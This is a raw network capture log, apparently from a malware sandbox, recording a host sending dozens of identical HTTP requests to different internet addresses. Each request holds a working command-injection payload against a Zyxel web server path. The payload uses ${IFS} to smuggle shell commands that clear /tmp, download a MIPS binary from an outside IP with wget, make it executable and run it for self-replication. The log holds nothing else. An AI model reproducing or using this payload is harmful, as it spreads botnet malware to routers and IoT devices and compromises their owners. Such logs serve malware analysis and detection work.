                                      Jan 14, 2024 15:51:04.718164921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8974192.168.2.1433324190.71.9.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718198061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8975192.168.2.1443976124.138.155.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718234062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8976192.168.2.1434988147.75.72.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718261003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8977192.168.2.1437136191.123.131.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718306065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8978192.168.2.1442330105.188.102.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718357086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8979192.168.2.1450262111.29.58.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718391895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8980192.168.2.1450358114.72.88.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718434095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8981192.168.2.144663471.1.8.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718465090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8982192.168.2.1448598126.25.110.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718533039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8983192.168.2.143959476.127.96.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718583107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8984192.168.2.1458444174.21.133.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718626022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8985192.168.2.146083873.2.232.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718662024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8986192.168.2.1440630149.39.246.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718702078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8987192.168.2.144635888.211.197.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718746901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8988192.168.2.1447174211.85.21.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718777895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8989192.168.2.1458834181.15.202.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718841076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8990192.168.2.1455736148.253.168.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718868017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8991192.168.2.1448246168.142.98.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718914032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8992192.168.2.145685244.107.166.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718945980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8993192.168.2.144734267.246.190.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718995094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8994192.168.2.1439382101.201.155.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719023943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8995192.168.2.1445986109.225.107.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719072104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8996192.168.2.1434160205.64.72.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719108105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8997192.168.2.144890449.84.135.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719155073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8998192.168.2.1451020126.245.143.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719199896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8999192.168.2.1437646173.206.133.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719238997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9000192.168.2.14535228.185.128.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719294071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9001192.168.2.145450013.13.70.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719331026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9002192.168.2.1453270108.187.35.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719393015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9003192.168.2.14501664.11.247.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719439030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9004192.168.2.1437132119.97.89.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719474077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9005192.168.2.145290274.161.148.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719512939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9006192.168.2.144059884.38.181.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719551086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9007192.168.2.1440228154.243.10.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719592094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9008192.168.2.1440814185.45.16.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719638109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9009192.168.2.1440364112.197.33.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719675064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9010192.168.2.1447712107.125.179.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719728947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9011192.168.2.1459648177.38.47.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719773054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9012192.168.2.1455056105.105.237.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719808102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9013192.168.2.144019825.158.224.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719856977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9014192.168.2.1442746181.116.192.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719886065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9015192.168.2.14353044.88.33.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719928026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9016192.168.2.1436830213.86.204.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719958067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9017192.168.2.1459260149.10.29.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.719990969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9018192.168.2.145514086.235.239.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720071077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9019192.168.2.143571896.126.163.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720113993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9020192.168.2.1457970201.209.111.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720149994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9021192.168.2.1447672143.77.63.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720191956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9022192.168.2.145964660.246.63.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720238924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9023192.168.2.1439590207.116.30.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720288038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9024192.168.2.1455200222.4.222.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720321894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9025192.168.2.1433350206.165.206.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720367908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9026192.168.2.1456568157.85.212.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720412016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9027192.168.2.144766462.105.154.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720446110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9028192.168.2.1451164110.220.213.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720491886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9029192.168.2.14519089.101.28.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720525026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9030192.168.2.1460606171.123.63.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720563889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9031192.168.2.1459926132.143.200.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720624924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9032192.168.2.1442626143.50.34.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720654964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9033192.168.2.1436030100.48.157.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720716953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9034192.168.2.144578481.193.91.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720786095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9035192.168.2.1441928221.147.227.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.720803022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9036192.168.2.1445358187.186.55.34443
                                      TimestampBytes transferredDirectionData
